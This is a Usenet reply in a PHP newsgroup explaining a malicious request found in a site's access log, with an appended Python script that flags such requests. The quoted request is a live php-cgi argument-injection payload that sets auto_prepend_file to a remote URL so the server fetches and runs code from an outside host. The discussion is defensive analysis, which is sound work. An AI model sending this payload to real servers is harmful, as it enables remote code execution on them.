From: Jan Hansen
Newsgroups: dk.edb.internet.webdesign.serverside.php
Subject: Re: Malicious request
Date: Wed, 15 Apr 2020 14:19:06 +0200
Message-ID: <20200415141906.726ca602f38e2a74861b5b75@gmail.com>
References: <1tdp12me6kivq.dlg@lundhansen.dk>

Bertel Lund Hansen wrote:

> I am playing around with some statistics on Fiduso's pages, and as part
> of that I read, among other things, $_SERVER['REQUEST_URI']. I wrote
> the collected data to a text file which I will then process with a
> statistics program.
>
> The following request turned up in the data file:
> /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://tenderplus.spb.ru//components/com_foxcontact/default.txt

If you are running PHP 5.4.3 or newer on that domain, nothing happens as
a result of it.

From :

"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when
configured as a CGI script (aka php-cgi), does not properly handle query
strings that lack an = (equals sign) character, which allows remote
attackers to execute arbitrary code by placing command-line options in
the query string, related to lack of skipping a certain php_getopt for
the 'd' case."

-- 
Regards, Jan.
Help Microsoft stamp out piracy. Give Linux to a friend today!
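The request quoted above has the shape the CVE text describes: it contains no literal "=" (every one is encoded as %3d), so a CGI server passes the "+"-separated words to the script as command-line arguments, and php-cgi then reads them as -d ini overrides. The following script is an added example, not code from either poster; it scans a file of collected REQUEST_URI values (a constructed sample is embedded, including the request from the thread) and flags entries of that shape, listing the ini directives they try to set. The no-"=" rule it implements comes from the CGI specification (RFC 3875, section 4.4); whether a flagged request actually did anything depends on the PHP version, as Jan notes.

```python
"""Flag REQUEST_URI values whose query string would reach php-cgi as argv."""
from urllib.parse import unquote, urlsplit

# Constructed sample of logged REQUEST_URI values: the request quoted in the
# thread plus a few ordinary requests for contrast.
SAMPLE_URIS = [
    "/index.php?page=stats&year=2020",
    "/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn"
    "+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://tenderplus.spb.ru"
    "//components/com_foxcontact/default.txt",
    "/index.php",
    "/search.php?q=php+cgi",
]


def cgi_argv(query):
    """Return the argv a CGI server hands to the script for this query string.

    Per RFC 3875 sec. 4.4 the query string is passed as command-line
    arguments only when it contains no unencoded '='; each '+'-separated
    word is then URL-decoded. An encoded '%3d' therefore does not count.
    """
    if query == "" or "=" in query:
        return []
    return [unquote(word) for word in query.split("+") if word]


def analyse_uri(uri):
    """Return None for an ordinary URI, or a dict describing injected options."""
    query = urlsplit(uri).query
    argv = cgi_argv(query)
    options = [arg for arg in argv if arg.startswith("-")]
    if not options:
        return None
    # Collect the ini settings that '-d name=value' arguments would override.
    directives = {}
    for arg in argv:
        if arg.startswith("-d") and "=" in arg:
            name, _, value = arg[2:].partition("=")
            directives[name] = value
    return {"uri": uri, "argv": argv, "ini_directives": directives}


def scan(uris):
    """Run analyse_uri over every logged URI and keep only the hits."""
    return [hit for hit in (analyse_uri(u) for u in uris) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_URIS):
        print(hit["uri"])
        for name, value in hit["ini_directives"].items():
            print(f"  -d {name}={value}")
```

Run it over the text file of REQUEST_URI values one line at a time (replace SAMPLE_URIS with the file's lines); anything it reports is worth excluding from the visitor statistics and checking against the PHP version and SAPI in use on that host.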